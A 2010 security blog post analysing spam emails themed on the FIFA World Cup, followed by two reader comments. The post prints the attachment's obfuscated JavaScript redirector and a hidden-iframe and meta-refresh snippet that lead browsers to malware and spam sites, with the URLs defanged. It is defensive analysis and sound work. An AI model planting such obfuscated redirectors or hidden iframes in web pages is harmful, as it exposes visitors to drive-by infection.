“FIFA World Cup South Africa… bad news” emails leads reader to host with malware
June 11, 2010 2 Comments
MX Lab intercepted a few samples of emails with the subject “FIFA World Cup South Africa… bad news”.
The from address is spoofed and this is the body of the email:
Hello!!
FIFA World Cup 2010 scandal news, read attached document
Attached is the file news.html or open.html that contains a malicious javascript:
<script type=’text/javascript’>function dX(){};var h=new Date();dX.prototype = {f : function() {var u=function(){};var uY=new Date();var o=”";var k=document;var oE=function(){};var l=”;this.i=33457;var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, ”)];var w=function(){};var p=false;this.pP=false;this.s=”;kV['hGrGe>f>'.replace(/[\>mYGw]/g, ”)]=’hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/
2xJnSuJ4JeSjS/2z2.ShltlmJ’.replace(/[JS2\>l]/g, ”);var iK=”iK”;pK=”;this.d=”d”;uM=”";}};this.dK=”";var fG=new dX();var dR=”dR”;fG.f();hJ=false;</script>
This Javascript will redirect your browser to hxxp://advancedwoodtech.com/xnu4ej/z.htm.
At the moment, the web site page mentioned here is not active, we got a 404 error when visiting, so we can’t investigate this further. But we are pretty sure that you will download some malware with an attempt to infect your computer and get redirected to a spam web site of the Canadian Pharmacy.
This email has all the characteristics of previous campaigns where social media is being used to lure visitors to a web site and get their computer infected.
Our recommendation is: when you receive this type of email, do not open the attached HTML file and delete the email.
[UPDATE]
MX Lab intercepted a new version of this social engineering attack and the email now contains the file open.html.
This leads to the web site hxxp://shoppingbazzar.co.uk/z.htm. The online document z.html contains the following code:
<meta http-equiv="refresh" content="3;url=hxxp://toldspeak.com/" /> <iframe src='hxxp://hugefrogs.ru:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>
This will redirect your browser to hxxp://toldspeak.com after 3 seconds that contains the Canadian Pharmacy web site as mentioned earlier.
The site hxxp://hugefrogs.ru:8080/index.php?pid=10 contains more obfuscated JavaScript that creates an iframe to a PDF file and to a Java .jar file. With one of these files an attack is being executed to the computer.
Thank you for deciphering this. I received it, and was very curious where it came from.
Our company recently received similar spoofed emails. Some sites obfuscated in the JavaScript were innocent and didn’t know their sites were being used as hosts. Here is a wiki article w/ some info on what you described. Although I understand it may be futile, I submitted complaints to the FTC (uec@ftc.gov) and the IC3. I also used Complainterator to aid in generating emails I sent to the registration organizations, asking them to remove the name servers hosting the spamming domains.